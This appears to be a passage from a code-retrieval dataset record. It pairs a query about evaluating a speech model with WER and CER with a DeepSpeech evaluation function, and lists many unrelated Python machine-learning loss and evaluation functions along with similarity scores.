tf.zeros_like(pred_trimaps))\r\n # total_weights = tf.reduce_sum(weights) + epsilon\r\n\r\n # trimap_losses = tf.sqrt(tf.square(pred_trimaps - gt_trimaps) + epsilon)\r\n # trimap_losses = tf.reduce_mean(trimap_losses)\r\n\r\n trimap_losses = tf.losses.softmax_cross_entropy(\r\n tf.concat([gt_alpha_matte, 1 - gt_alpha_matte], axis=3),\r\n tf.concat([foreground, background], axis=3))\r\n alpha_losses = tf.sqrt(tf.square(alpha_matte_p - gt_alpha_matte) + epsilon)\r\n alpha_losses = tf.reduce_mean(alpha_losses)\r\n\r\n composition_losses = tf.sqrt(tf.square(pred_images / 255. - gt_images / 255.) + epsilon)\r\n composition_losses = tf.reduce_mean(composition_losses)\r\n\r\n loss = (self._alpha_loss_weight * alpha_losses +\r\n self._first_stage_image_loss_weight * composition_losses +\r\n self._trimap_loss_weight * trimap_losses)\r\n loss_dict = {'trimap_losses': trimap_losses,\r\n 'alpha_losses': alpha_losses,\r\n 'composition_losses': composition_losses,\r\n 'loss': loss}\r\n return loss_dict", "def pseudo_loss(self, params, batches):\n loss = 0\n for batch in batches:\n states = batch[\"states\"]\n actions = batch[\"actions\"]\n returns = batch[\"returns\"]\n\n preds = self.predict_jax(params, states)\n\n baseline = jnp.mean(returns, axis=0)\n preds_select = jnp.take_along_axis(preds, jnp.expand_dims(actions, axis=2), axis=2).squeeze()\n loss += (-jnp.mean(jnp.sum(preds_select * (returns - baseline))))\n\n return loss + self.l2_regularizer(params, 0.001) # try to divide by len(batches)?", "def get_loss(self, criterion, target, preds, epoch=0):\n assert isinstance(target, dict)\n assert isinstance(preds, dict)\n assert isinstance(criterion, dict)\n\n loss = {\"total\": 0, \"all_class\": 0}\n\n for key in target[\"class\"].keys():\n labels = target[\"class\"][key]\n batch_size = target[\"class\"][key].shape[0]\n loss[key] = criterion[\"crossentropy\"](preds[key], labels)\n loss[\"all_class\"] += loss[key]\n\n loss[\"total\"] += loss[\"all_class\"]\n\n if self.use_attention and not self.cfg.model.attention.use_fixed:\n if self.training and epoch + 1 < self.cfg.model.attention.decay_step:\n prior_multiplier = 0\n contrast_multiplier = 0\n entropy_multiplier = 0\n else:\n prior_multiplier = self.cfg.model.attention.wt_decay\n contrast_multiplier = self.cfg.model.attention.contrast_decay\n entropy_multiplier = self.cfg.model.attention.entropy_decay\n\n wts = preds[\"weights\"].squeeze(1)\n\n if self.cfg.model.attention.use_prior:\n b, n, _, _ = target[\"weights\"].shape\n assert wts.shape[0] == b * n\n prior = target[\"weights\"].reshape(b * n, -1)\n if self.cfg.model.attention.wt_loss == \"kl\":\n wts = torch.log(wts + 1e-7)\n loss[\"prior\"] = criterion[\"prior\"](wts, prior)\n loss[\"total\"] += prior_multiplier * loss[\"prior\"]\n if self.cfg.model.attention.use_contrast:\n loss[\"contrast\"] = criterion[\"contrast\"](wts)\n loss[\"total\"] += contrast_multiplier * loss[\"contrast\"]\n if self.cfg.model.attention.use_entropy:\n loss[\"entropy\"] = Categorical(probs=wts + 1e-6).entropy().mean()\n # if the loss minimization goes below threshold, stop training with entropy loss\n if (\n self.training\n and entropy_multiplier > 0\n and loss[\"entropy\"] < self.cfg.model.attention.entropy_thresh\n ):\n entropy_multiplier = 0\n loss[\"total\"] += entropy_multiplier * loss[\"entropy\"]\n\n return loss, batch_size", "def loss_total(self):\r\n def loss(y_true, y_pred):\r\n l2 = 1/2*K.sum(K.square(y_true-y_pred))\r\n\r\n return l2\r\n return loss", "def compute_class_loss(y_true, raw_prediction, object_mask, batch_size):\n true_class_probabilities = y_true[..., 5:]\n predicted_class_probabilities = raw_prediction[..., 5:]\n\n cross_entropy = K.binary_crossentropy(target=true_class_probabilities, output=predicted_class_probabilities,\n from_logits=True)\n class_loss = object_mask * cross_entropy\n class_loss = K.sum(class_loss) / batch_size\n return class_loss", "def classification_loss(self, logit, target):\n return F.cross_entropy(logit, target)", "def compute_loss(self):\n self.prototypes = self.compute_prototypes()\n self.test_logits = self.compute_logits()\n loss = tf.nn.sparse_softmax_cross_entropy_with_logits(\n labels=self.episode.test_labels, logits=self.test_logits)\n cross_entropy_loss = tf.reduce_mean(loss)\n regularization = tf.reduce_sum(\n tf.get_collection(tf.GraphKeys.REGULARIZATION_LOSSES))\n loss = cross_entropy_loss + self.weight_decay * regularization\n return loss", "def reconstruction_loss(x, t_decoded):\r\n return K.sum((K.batch_flatten(x) - K.batch_flatten(t_decoded)) ** 2,\r\n axis=-1)", "def loss_perceptual(self, vgg_out, vgg_gt, vgg_comp): \n loss = 0\n for o, c, g in zip(vgg_out, vgg_comp, vgg_gt):\n loss += self.l1(o, g) + self.l1(c, g)\n return loss", "def compute_loss(self, batch, y_next_true):\n\n # Get the output of the gru layer for the input which serves as input to the reconstruction + forecasting model\n gru_output = self.model(batch, training=True)\n\n # Forecasting model loss calculation\n # Using mse yields the same result as RMSE and is more stable\n y_next_pred = self.model.forecasting_model(gru_output, training=True)\n y_next_pred = y_next_pred[:, -1, :] # only get the prediction for the last timestamp\n\n mse_for = tf.keras.losses.MeanSquaredError()\n loss_for = mse_for(y_next_true, y_next_pred)\n\n # Reconstruction model loss calculation\n # Like VAE based on: https://bit.ly/3oRMiQz\n mse_rec = tf.keras.losses.MeanSquaredError()\n reconstructed_output = self.model.reconstruction_model(gru_output)\n reconstruction_target = gru_output if 'reconstruct_gru' in self.hyper.variants else batch\n\n loss_rec = mse_rec(reconstruction_target, reconstructed_output)\n loss_rec += sum(self.model.reconstruction_model.losses) # Add KLD regularization loss\n\n # Overall loss\n loss = loss_for + loss_rec\n\n return loss", "def crossentropy_max_core(y_true, y_pred):\n\n # hyper param\n print(_m)\n y_pred = K.clip(y_pred, K.epsilon(), 1)\n\n # compute loss for every data point\n _loss = -K.sum(y_true * K.log(y_pred), axis=-1)\n\n # threshold\n t_m = K.max(_loss) * _m\n _mask_m = 1 - (K.cast(K.greater(_loss, t_m), 'float32'))\n _loss = _loss * _mask_m\n\n return _loss", "def _loss(self, preds, labels):\n if self.sigmoid_loss:\n assert preds.shape == labels.shape\n return torch.nn.BCEWithLogitsLoss()(preds, labels) * preds.shape[1]\n else:\n if len(labels.shape) == 2: # flatten to 1D\n labels = torch.max(labels, axis=1)[1] # this can handle both bool and float types\n return torch.nn.CrossEntropyLoss()(preds, labels)", "def loss(self, prediction_dict, groundtruth_lists):\r\n pass", "def charbonnier_loss(y_true, y_pred, y_mask):\n y_shape = tf.shape(y_true)\n border = 3\n max_pixels_shifts = 2*border\n # crop the center of the reconstructed HR image\n size_image = HR_SIZE\n size_croped_image = size_image - max_pixels_shifts\n clear_pixels = size_croped_image*size_croped_image\n cropped_predictions = y_pred[:, border:size_image -\n border, border:size_image-border]\n alpha = 0.45\n beta = 1.0\n epsilon = 0.001\n\n X = []\n for i in range(max_pixels_shifts+1): # range(7)\n for j in range(max_pixels_shifts+1): # range(7)\n cropped_labels = y_true[:, i:i+(size_image-max_pixels_shifts),\n j:j+(size_image-max_pixels_shifts)]\n cropped_y_mask = y_mask[:, i:i+(size_image-max_pixels_shifts),\n j:j+(size_image-max_pixels_shifts)]\n\n cropped_y_mask = tf.cast(cropped_y_mask, tf.float32)\n\n cropped_predictions_masked = cropped_predictions*cropped_y_mask\n cropped_labels_masked = cropped_labels*cropped_y_mask\n\n total_pixels_masked = tf.reduce_sum(cropped_y_mask, axis=[1, 2])\n\n # bias brightness\n b = (1.0/total_pixels_masked)*tf.reduce_sum(\n tf.subtract(cropped_labels_masked, cropped_predictions_masked),\n axis=[1, 2])\n\n b = tf.reshape(b, [y_shape[0], 1, 1, 1])\n\n corrected_cropped_predictions = cropped_predictions_masked+b\n corrected_cropped_predictions = corrected_cropped_predictions*cropped_y_mask\n diff = tf.subtract(cropped_labels_masked,\n corrected_cropped_predictions)\n\n error = tf.pow(tf.square(diff * beta) + tf.square(epsilon), alpha)\n error = tf.multiply(cropped_y_mask, error)\n\n X.append(tf.reduce_sum(error) / total_pixels_masked)\n\n X = tf.stack(X)\n # Take the minimum mse\n minim = tf.reduce_min(X, axis=0)\n return minim", "def loss_fn(self, lbl, y):\n\n binlbl = self._to_device(lbl[:,0]>.5)\n # center = self._to_device(lbl[:,3]) \n offset = 5. * self._to_device(lbl[:,1:]) \n\n loss = self.criterion(y[:,:2], offset) \n loss2 = self.criterion2(y[:,2], binlbl)\n\n # loss3 = self.criterion(y[:,3], center)\n\n loss = loss + loss2\n return loss", "def score(y_true, y_pred):\n tf.dtypes.cast(y_true, tf.float32)\n tf.dtypes.cast(y_pred, tf.float32)\n sigma = y_pred[:, 2] - y_pred[:, 0]\n fvc_pred = y_pred[:, 1]\n\n sigma_clip = tf.maximum(sigma, C1)\n # Python is automatically broadcasting y_true with shape (1,0) to\n # shape (3,0) in order to make this subtraction work\n delta = tf.abs(y_true[:, 0] - fvc_pred)\n delta = tf.minimum(delta, C2)\n sq2 = tf.sqrt(tf.dtypes.cast(2, dtype=tf.float32))\n metric = (delta / sigma_clip) * sq2 + tf.math.log(sigma_clip * sq2)\n return K.mean(metric)", "def triplet_loss(y_true, y_pred, alpha=0.5):\n print('y_pred.shape = ', y_pred)\n\n total_lenght = y_pred.shape.as_list()[-1]\n # print('total_lenght=', total_lenght)\n # total_lenght =12\n\n anchor = y_pred[:, 0:int(total_lenght * 1 / 3)]\n positive = y_pred[:, int(total_lenght * 1 / 3):int(total_lenght * 2 / 3)]\n negative = y_pred[:, int(total_lenght * 2 / 3):int(total_lenght * 3 / 3)]\n\n # distance between the anchor and the positive\n pos_dist = K.sum(K.square(anchor - positive), axis=1)\n\n # distance between the anchor and the negative\n neg_dist = K.sum(K.square(anchor - negative), axis=1)\n\n # compute loss\n basic_loss = pos_dist - neg_dist + alpha\n loss = tf.reduce_mean(K.maximum(basic_loss, 0.0))\n\n return loss", "def calc_loss(prediction, target, bce_weight=0.5):\n # prediction = F.softmax(prediction)\n prediction = F.sigmoid(prediction)\n bce = F.binary_cross_entropy(prediction, target)\n \n dice = dice_loss(prediction, target)\n\n loss = bce * bce_weight + dice * (1 - bce_weight)\n\n return loss", "def train_step(self, X_batch: np.ndarray, Y_batch: np.ndarray):\n\n # Almost the same as previous task, calculates the cross entropy loss for multiple classes using the softmax loss equation provided in the assignment.\n targets = Y_batch\n outputs = self.model.forward(X_batch)\n self.model.backward(X_batch, outputs, targets)\n \n self.model.w += -self.learning_rate*self.model.grad\n \n loss = cross_entropy_loss(targets, outputs)\n return loss", "def calculate_loss(self, train_x, train_y):\n self.log.info(\"Calculating average categorical crossentropy loss...\")\n\n num_words = np.sum([len(y) for y in train_y])\n return self.calculate_total_loss(train_x, train_y)/float(num_words)", "def _rpn_loss_cls(y_true, y_pred):\n y_true = y_true[0][0]\n cls_keep = tf.where(tf.not_equal(y_true, -1))[:, 0]\n cls_true = tf.gather(y_true, cls_keep)\n cls_pred = tf.gather(y_pred[0], cls_keep)\n cls_true = tf.cast(cls_true, 'int64')\n loss = tf.nn.sparse_softmax_cross_entropy_with_logits(labels=cls_true, logits=cls_pred)\n return K.switch(tf.size(loss) > 0, K.clip(K.mean(loss), 0, 10), K.constant(0.0))", "def triplet_loss(y_true, y_pred, alpha = 0.2):\r\n \r\n anchor, positive, negative = y_pred[0], y_pred[1], y_pred[2]\r\n \r\n # Step 1: Compute the (encoding) distance between the anchor and the positive, you will need to sum over axis=-1\r\n pos_dist = tf.reduce_sum(tf.square(tf.subtract(anchor, positive)), axis=-1)\r\n # Step 2: Compute the (encoding) distance between the anchor and the negative, you will need to sum over axis=-1\r\n neg_dist = tf.reduce_sum(tf.square(tf.subtract(anchor, negative)), axis=-1)\r\n # Step 3: subtract the two previous distances and add alpha.\r\n basic_loss = tf.add(tf.subtract(pos_dist, neg_dist), alpha)\r\n # Step 4: Take the maximum of basic_loss and 0.0. Sum over the training examples.\r\n loss = tf.reduce_sum(tf.maximum(basic_loss, 0))\r\n # END CODE HERE \r\n \r\n return loss", "def compute_loss(darknet_output, ground_truth):\n darknet_output = tf.reshape(darknet_output, [-1, 13, 13, 5, 85])\n net_raw_xy = darknet_output[..., :2]\n net_raw_hw = darknet_output[..., 2:4]\n net_raw_conf = darknet_output[..., 4:5]\n net_raw_prob = darknet_output[..., 5:]\n\n\n prediction = output_to_prediction(darknet_output)\n prediction = tf.reshape(prediction, [-1, 13, 13, 5, 85])\n\n # the factor used to calculate the object weight\n obj_scale = 5\n\n # the factor used to calculate the no object weight\n no_obj_scale = 1\n\n # the factor used to calculate the class prediction loss\n class_scale = 1\n\n # the factor factor used to calculate the coordinate loss\n coordinates_scale = 1\n\n # decode the prediction, convert all values to the 13x13 feature map\n pred_xy_offset = prediction[..., :2]\n pred_hw_ratio = prediction[..., 2:4]\n pred_conf = prediction[..., 4:5]\n pred_class = prediction[..., 5:]\n\n # decode the ground truth, convert all values to the 13x13 feature map\n gt_xy_offset = ground_truth[..., :2]\n gt_hw_ratio = ground_truth[..., 2:4]\n gt_conf = ground_truth[..., 4:5]\n gt_class = ground_truth[..., 5:]\n\n # 13 x 13 x 2 tensor, used to compute the x and y in the 13 x 13 feature map\n biases = tf.Variable([[[j * 1.0, i * 1.0] for i in range(13)] for j in range(13)])\n biases = tf.reshape(biases, [1, 13, 13, 1, 2])\n\n box_priors = tf.Variable([[0.57273, 0.677385], [1.87446, 2.06253], [3.33843, 5.47434], [7.88282, 3.52778], [9.77052, 9.16828]])\n box_priors = tf.reshape(box_priors, [1, 1, 1, 5, 2])\n\n pred_xy = pred_xy_offset + biases\n pred_hw = pred_hw_ratio * box_priors\n\n gt_xy = gt_xy_offset + biases\n gt_hw = gt_hw_ratio * box_priors\n\n # calculate the top-left and bottom-right point of the predicted box\n pred_xy_min, pred_xy_max = pred_xy - pred_hw / 2.0, pred_xy + pred_hw / 2.0\n\n gt_xy_min, gt_xy_max = gt_xy - gt_hw / 2.0, gt_xy + gt_hw / 2.0\n\n intersection_min = tf.maximum(gt_xy_min, pred_xy_min)\n intersection_max = tf.minimum(gt_xy_max, pred_xy_max)\n intersection_hw = tf.maximum(intersection_max - intersection_min, 0.0)\n\n # calculate the intersection area and the union area of the prediction and the ground truth\n intersection_area = tf.multiply(intersection_hw[..., 0], intersection_hw[..., 1])\n union_area = tf.multiply(gt_hw[..., 0], gt_hw[..., 1]) + tf.multiply(pred_hw[..., 0],\n pred_hw[..., 1]) - intersection_area\n # shape of iou: (?, 13, 13, 5)\n box_iou = intersection_area / union_area\n\n obj = gt_conf\n\n gt_raw_hw = tf.log(gt_hw_ratio)\n\n gt_raw_hw = tf.where(tf.is_inf(gt_raw_hw), tf.zeros_like(gt_raw_hw), gt_raw_hw)\n\n # ======================================================================================\n\n coords_xy_loss = tf.nn.sigmoid_cross_entropy_with_logits(logits=net_raw_xy, labels=gt_xy_offset) * obj * coordinates_scale\n coords_xy_loss = tf.reduce_sum(coords_xy_loss)\n\n coords_wh_loss = tf.square(net_raw_hw - gt_raw_hw) * 0.5 * obj * coordinates_scale\n\n coords_wh_loss = tf.reduce_sum(coords_wh_loss)\n\n coords_loss = coords_xy_loss + coords_wh_loss\n\n ignore_thresh = 0.5\n\n ignore_mask = tf.cast(tf.less(box_iou, ignore_thresh * tf.ones_like(box_iou)), tf.float32)\n ignore_mask = tf.reshape(ignore_mask, [-1, 13, 13, 5])\n ignore_mask = tf.expand_dims(ignore_mask, -1)\n\n back_loss = ((1 - obj) * tf.nn.sigmoid_cross_entropy_with_logits(logits=net_raw_conf, labels=obj) * ignore_mask)\n back_loss = tf.reduce_sum(back_loss)\n\n fore_loss = obj * tf.nn.sigmoid_cross_entropy_with_logits(logits=net_raw_conf, labels=obj)\n\n fore_loss = tf.reduce_sum(fore_loss)\n\n conf_loss = back_loss + fore_loss\n\n class_loss = tf.reduce_sum(obj * tf.nn.sigmoid_cross_entropy_with_logits(logits=net_raw_prob, labels=gt_class))\n\n loss = coords_loss + conf_loss + class_loss\n\n return loss", "def get_contractive_loss(self):\n keys = list(self.head.state_dict().keys())\n W = Variable(self.head.state_dict()[keys[-2]])\n if torch.cuda.is_available():\n W = W.cuda()\n contractive_loss = torch.sum(W**2, dim=1).sum()\n return contractive_loss", "def loss(self,\n inputs: Union[Tensor, Tuple[Tensor]],\n batch_data_samples: OptSampleList,\n train_cfg: ConfigType = {}) -> dict:\n\n pred_outputs = self.forward(inputs)\n\n lifting_target_label = torch.cat([\n d.gt_instance_labels.lifting_target_label\n for d in batch_data_samples\n ])\n trajectory_weights = torch.cat([\n d.gt_instance_labels.trajectory_weights for d in batch_data_samples\n ])\n\n # calculate losses\n losses = dict()\n loss = self.loss_module(pred_outputs, lifting_target_label,\n trajectory_weights.unsqueeze(-1))\n\n losses.update(loss_traj=loss)\n\n # calculate accuracy\n _, avg_acc, _ = keypoint_pck_accuracy(\n pred=to_numpy(pred_outputs),\n gt=to_numpy(lifting_target_label),\n mask=to_numpy(trajectory_weights) > 0,\n thr=0.05,\n norm_factor=np.ones((pred_outputs.size(0), 3), dtype=np.float32))\n\n mpjpe_traj = torch.tensor(avg_acc, device=lifting_target_label.device)\n losses.update(mpjpe_traj=mpjpe_traj)\n\n return losses", "def loss(params: hk.Params, batch, label) -> jnp.ndarray:\r\n logits = net.apply(params, batch)\r\n labels = jax.nn.one_hot(label, n_classes)\r\n\r\n # Cross Entropy Loss\r\n softmax_xent = -jnp.sum(labels * jax.nn.log_softmax(logits))\r\n softmax_xent /= labels.shape[0]\r\n return softmax_xent", "def triplet_loss(y_true, y_pred):\n [a,p,n] = tf.unstack(y_pred, num=3)\n pos_dist = tf.reduce_sum((a - p)**2, axis=-1)\n neg_dist = tf.reduce_sum((a - n)**2, axis=-1)\n basic_loss = pos_dist - neg_dist + 0.1\n loss = tf.reduce_sum(tf.maximum(basic_loss, 0.0)) \n return loss", "def cls_wrapper(target_labels, predicted_labels):\n # Find which targets contribute to the loss (targets with non-neutral labels)\n contributing_indices = tf.where(tf.not_equal(target_labels, -1))\n\n # Take contributing\n target_labels = tf.gather_nd(target_labels, contributing_indices)\n contributing_prediction = tf.gather_nd(predicted_labels, contributing_indices)\n\n # Compute loss\n res = function(target_labels,\n contributing_prediction)\n\n # Zero batch size case\n return K.switch(tf.size(res) > 0, K.mean(res), tf.constant(0.0))", "def score_eval_batch(datas,model):\n tf_eval_preds_batch = []\n\n for i in range(len(datas.eval_batchs)):\n tf_eval_preds, _ = model.run(datas=datas, mode=model.inf_signal, batch_id=i)\n tf_eval_preds_batch.append(tf_eval_preds)\n tf_eval_preds = np.concatenate(tf_eval_preds_batch)\n\n y_nz = [sum(x) > 0 for x in datas.target]\n y_nz = np.arange(datas.target.shape[0])[y_nz]\n\n preds_all = tf_eval_preds[y_nz, :]\n y = datas.target[y_nz, :]\n\n x = scipy.sparse.lil_matrix(y.shape)\n x.rows = preds_all\n x.data = np.ones_like(preds_all)\n x = x.toarray()\n\n z = x * y\n return np.mean(np.divide((np.sum(z, 1)), np.sum(y, 1)))", "def cross_entropy(self, yhat):\n n = len(self._y)\n c = 0.0\n for i in range(0, n):\n c += self._y[i] * log(\n yhat[i]) + (1 - self._y[i]) * log(1 - yhat[i])\n\n return c", "def valid_loss(model, data):\n c = Counter()\n for item in data.iter_valid_batches():\n inp, out_v, out_prev_t, out_t = item\n cost, cost_t, cost_v = model.loss_test(inp, out_v, out_prev_t, out_t)\n c += Counter({'cost_t': cost_t, 'cost_v': cost_v, 'cost': cost, 'N': 1})\n return c", "def eval_func(batched_data, model):\n \n # This function uses a model to compute predictions on data coming in batches.\n # Then it calculates the accuracy of predictions with respect to the gold labels.\n correct = 0\n total = 0\n predicted = None\n gold_label = None\n\n # Initialize the confusion matrix\n nb_classes = 20\n confusion_matrix = torch.zeros(nb_classes, nb_classes)\n\n with torch.no_grad():\n # Iterating over all batches (can be 1 batch as well):\n for n, (input_data, gold_label) in enumerate(batched_data):\n out = model(input_data)\n predicted = out.argmax(1)\n correct += len((predicted == gold_label).nonzero())\n total += len(gold_label)\n # Update the confusion matrix\n for i in range(len(predicted)):\n confusion_matrix[predicted[i], gold_label[i]] += 1\n accuracy = correct / total\n\n return accuracy, predicted, gold_label, confusion_matrix", "def add_pred_op(self):\n if not self.config.use_crf:\n self.labels_pred = tf.cast(tf.argmax(self.logits, axis=-1),\n tf.int32)" ]
[ "0.7081912", "0.70582753", "0.6970499", "0.6948209", "0.69290686", "0.68720865", "0.6859095", "0.67881185", "0.65927947", "0.6434992", "0.6425474", "0.64251554", "0.6351377", "0.6332072", "0.619035", "0.6178352", "0.61739546", "0.6164014", "0.61629915", "0.61627495", "0.6115041", "0.6095366", "0.6074938", "0.60625374", "0.6042776", "0.60398203", "0.6036722", "0.6028721", "0.6024012", "0.6009784", "0.5995585", "0.5960501", "0.59590745", "0.59470224", "0.5930522", "0.592899", "0.59260863", "0.5920267", "0.5919828", "0.5916961", "0.59060675", "0.5885409", "0.5877196", "0.5873153", "0.58642006", "0.5855486", "0.585128", "0.5839608", "0.58322656", "0.58247674", "0.581662", "0.5815757", "0.5807546", "0.5770715", "0.57663715", "0.5763341", "0.57609534", "0.5735404", "0.57320285", "0.5729884", "0.5724366", "0.5720391", "0.5702535", "0.5698871", "0.5698221", "0.56968594", "0.5694749", "0.5693408", "0.56868654", "0.5686861", "0.568283", "0.5678756", "0.56777596", "0.5674204", "0.56721956", "0.5665529", "0.565644", "0.56555676", "0.56480765", "0.5643254", "0.56329167", "0.5632544", "0.56271434", "0.5624069", "0.5609491", "0.56092674", "0.55846685", "0.55843043", "0.55797696", "0.55786437", "0.55733204", "0.55713356", "0.55637354", "0.5559621", "0.555721", "0.5554608", "0.55525506", "0.554928", "0.55452436", "0.5544179" ]
0.68982947
5
Evaluate the model performance using WER anc CER as metrics.
def evaluate_model(estimator: es.Estimator, speech_labels: List[str], entries, input_fn_eval) -> Dict[str, float]: # Get predictions predictions = estimator.predict(input_fn=input_fn_eval) # Get probabilities of each predicted class probs = [pred["probabilities"] for pred in predictions] num_of_examples = len(probs) targets = [entry[1] for entry in entries] # The ground truth transcript total_wer, total_cer = 0., 0. greedy_decoder = decoder.DeepSpeechDecoder(speech_labels, blank_index=28) for prob, target in zip(probs, targets): decode = greedy_decoder.decode(prob) total_cer += greedy_decoder.cer(decode, target) total_wer += greedy_decoder.wer(decode, target) total_cer /= num_of_examples total_wer /= num_of_examples global_step = estimator.get_variable_value(tf.GraphKeys.GLOBAL_STEP) eval_results = { _WER_KEY: total_wer, _CER_KEY: total_cer, tf.GraphKeys.GLOBAL_STEP: global_step } return eval_results
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def evaluate(model, train_corpus, test_coprus, vocab=idx2word,\r\n num_docs_test=num_docs_test, tc=tc, td=td,\r\n eval_batch_size=_eval_batch_size,\r\n vocab_size=vocab_size,\r\n bow_norm=bow_norm):\r\n\r\n model.eval() # set model in evaluation mode\r\n with torch.no_grad():\r\n indices = torch.split(torch.tensor(range(num_docs_test)), eval_batch_size)\r\n\r\n ## get \\beta here\r\n beta = model.get_beta()\r\n\r\n ### do dc and tc here\r\n acc_loss = 0\r\n cnt = 0\r\n\r\n for idx, ind in enumerate(indices):\r\n data_batch = get_batch(test_corpus, ind, vocab_size, device)\r\n sums = data_batch.sum(1).unsqueeze(1)\r\n if bow_norm:\r\n normalized_data_batch = data_batch / sums\r\n else:\r\n normalized_data_batch = data_batch\r\n\r\n ## get theta\r\n theta, _ = model.get_theta(normalized_data_batch)\r\n ## get prediction loss\r\n res = torch.mm(theta, beta)\r\n preds = torch.log(res)\r\n recon_loss = -(preds * data_batch).sum(1)\r\n loss = recon_loss / sums.squeeze()\r\n loss = loss.mean().item()\r\n acc_loss += loss\r\n cnt += 1\r\n\r\n # Calculate final loss\r\n cur_loss = acc_loss / cnt\r\n ppl_dc = round(math.exp(cur_loss), 1)\r\n print('Eval Doc Completion PPL: {}'.format(ppl_dc))\r\n\r\n if tc or td: # calculate topic coherence or topic diversity\r\n beta = beta.data.cpu().numpy()\r\n if tc:\r\n print('Computing topic coherence...')\r\n utils.get_topic_coherence(beta, train_corpus, vocab)\r\n if td:\r\n print('Computing topic diversity...')\r\n utils.get_topic_diversity(beta, 25)\r\n return ppl_dc", "def evaluate(m, source, tc=False, td=False):\n\n m.eval()\n with torch.no_grad():\n if source == 'val':\n indices = torch.split(torch.tensor(range(args.num_docs_valid)), args.eval_batch_size)\n tokens = valid_tokens\n counts = valid_counts\n else: \n indices = torch.split(torch.tensor(range(args.num_docs_test)), args.eval_batch_size)\n tokens = test_tokens\n counts = test_counts\n\n\n ### do dc and tc here\n acc_loss = 0\n cnt = 0\n\n # Get parameter given econ variables \n theta = model.get_theta(econ_test)\n beta = model.get_beta()\n\n \n # Get prediction loss given the text \n normalized_data_batch, data_batch = batch(vocab_size, args.num_docs_test, test_tokens, test_counts, device)\n \n sums_2 = data_batch.sum(1).unsqueeze(1)\n res = torch.mm(theta, beta)\n preds = torch.log(res)\n recon_loss = -(preds * data_batch).sum(1)\n \n loss = recon_loss / sums_2.squeeze()\n loss = loss.mean().item()\n acc_loss += loss\n cnt += 1\n \n \n cur_loss = acc_loss / cnt\n ppl_dc = round(math.exp(cur_loss), 1)\n print('*'*100)\n print('{} Doc Completion PPL: {}'.format(source.upper(), ppl_dc))\n print('*'*100)\n if tc or td:\n beta = beta.data.cpu().numpy()\n if tc:\n print('Computing topic coherence...')\n get_topic_coherence(beta, train_tokens, vocab)\n if td:\n print('Computing topic diversity...')\n get_topic_diversity(beta, 25)\n return ppl_dc", "def evaluate_model():\n\n # Get the processed data (in proper format to evaluate the NER model)\n data = get_json_from_file_path(PROCESSED_DATA_PATH)\n # Split the dataset for training and test as we did for training\n train_data, test_data = train_test_split(data, train_size=0.7, \n random_state=4)\n\n # Load the model trained\n try:\n ner_model = spacy.load(OUTPUT_MODEL_PATH)\n except Exception as err:\n msg = f'Could not load the model. Error: {err}'\n raise Exception(msg)\n\n # Compute evaluation scores\n print('Computing metrics...')\n scores = evaluate(ner_model, test_data)\n # General metrics of the model\n f_score = scores.get('ents_f')\n precision = scores.get('ents_p')\n recall = scores.get('ents_r')\n print('\\nScoring:')\n print(f'F-score: {f_score}')\n print(f'Precision: {precision}')\n print(f'Recall: {recall}')\n\n # Get the specific scores for each entity \n scores_per_entity = scores.get('ents_per_type')\n # Get the F-score of the entities\n f_scores_of_entities = []\n for entity_scores in scores_per_entity.values():\n f_scores_of_entities.append(entity_scores['f'])\n # Compute the macro averaged F-score\n macro_avg_f_score = sum(f_scores_of_entities)/len(f_scores_of_entities)\n print(f'Macro averaged F-score: {macro_avg_f_score}')\n \n print('\\nScores per entity;')\n print('{:<15} {:<10} {:<10} {:<10}'.format('Entity','F-score','Precision','Recall'))\n for key, value in scores_per_entity.items():\n entity = key\n f, p, r = value['f'], value['p'], value['r']\n print('{:<15} {:<10.2f} {:<10.2f} {:<10.2f}'.format(entity, f, p, r))", "def evaluate(cfg: DictConfig):\n\n experiments = cfg.get('experiment_type', f'{cfg.model.name}_only')\n fixed_t0 = cfg.get('fixed_t0', False)\n ext = '_fixedT0' if fixed_t0 else ''\n\n base_dir = cfg.device.root\n datasource = cfg.datasource.name\n\n if experiments == 'ablations':\n models = {\n 'FluxRGNN': ['final',\n 'final_without_encoder',\n 'final_without_boundary'],\n 'LocalLSTM': ['final']\n }\n elif experiments == 'final':\n models = {\n 'FluxRGNN': ['final'],\n 'GAM': ['final'],\n 'HA': ['final'],\n 'GBT': ['final']\n }\n else:\n m = cfg.model.name\n year = cfg.datasource.test_year\n\n # find all experiments available for this model, datasource and test year\n result_dir = osp.join(base_dir, 'results', datasource, m, f'test_{year}')\n models = {\n m : [ f.name for f in os.scandir(result_dir) if f.is_dir() ]\n }\n\n\n # thresholds for binary classification metrics\n if cfg.datasource.name == 'abm':\n thresholds = [0.0019, 0.0207]\n else:\n thresholds = [0, 10, 20]\n\n rmse_per_hour = []\n mae_per_hour = []\n pcc_per_hour = []\n bin_per_hour = []\n\n rmse_per_night = []\n mae_per_night = []\n\n output_dir = osp.join(base_dir, 'results', datasource, f'performance_evaluation{ext}', experiments)\n os.makedirs(output_dir, exist_ok=True)\n\n counter = 0\n\n for m, dirs in models.items():\n print(f'evaluate {m}')\n\n for d in dirs:\n result_dir = osp.join(base_dir, 'results', datasource, m, f'test_{cfg.datasource.test_year}', d)\n\n # check if directory exists\n if os.path.isdir(result_dir):\n results, model_cfg = load_cv_results(result_dir, trials=cfg.task.repeats, ext=ext)\n\n df_prep = pd.read_csv(osp.join(base_dir, 'data', 'preprocessed',\n f'{model_cfg[\"t_unit\"]}_{model_cfg[\"model\"][\"edge_type\"]}_ndummy={model_cfg[\"datasource\"][\"n_dummy_radars\"]}',\n datasource, cfg.season, str(cfg.datasource.test_year), 'dynamic_features.csv'))\n tidx2night = dict(zip(df_prep.tidx, df_prep.nightID))\n\n rmse_per_hour.append(compute_rmse(m, d, results, tidx2night, groupby=['horizon', 'trial'],\n threshold=0, km2=True, fixed_t0=fixed_t0))\n mae_per_hour.append(compute_mae(m, d, results, tidx2night, groupby=['horizon', 'trial'],\n threshold=0, km2=True, fixed_t0=fixed_t0))\n pcc_per_hour.append(compute_pcc(m, d, results, tidx2night, groupby=['horizon', 'trial'],\n threshold=0, km2=True, fixed_t0=fixed_t0))\n\n if fixed_t0:\n rmse_per_night.append(compute_rmse_per_night(m, d, results, tidx2night, groupby=['night_horizon', 'trial']))\n mae_per_night.append(compute_mae_per_night(m, d, results, tidx2night, groupby=['night_horizon', 'trial']))\n\n # compute binary classification measures\n for thr in thresholds:\n bin_per_hour.append(compute_bin(m, d, results, groupby=['horizon', 'trial'], threshold=thr, km2=True))\n\n counter += 1\n\n else:\n print(f'Experiment \"{d}\" for model \"{m}\" and datasource 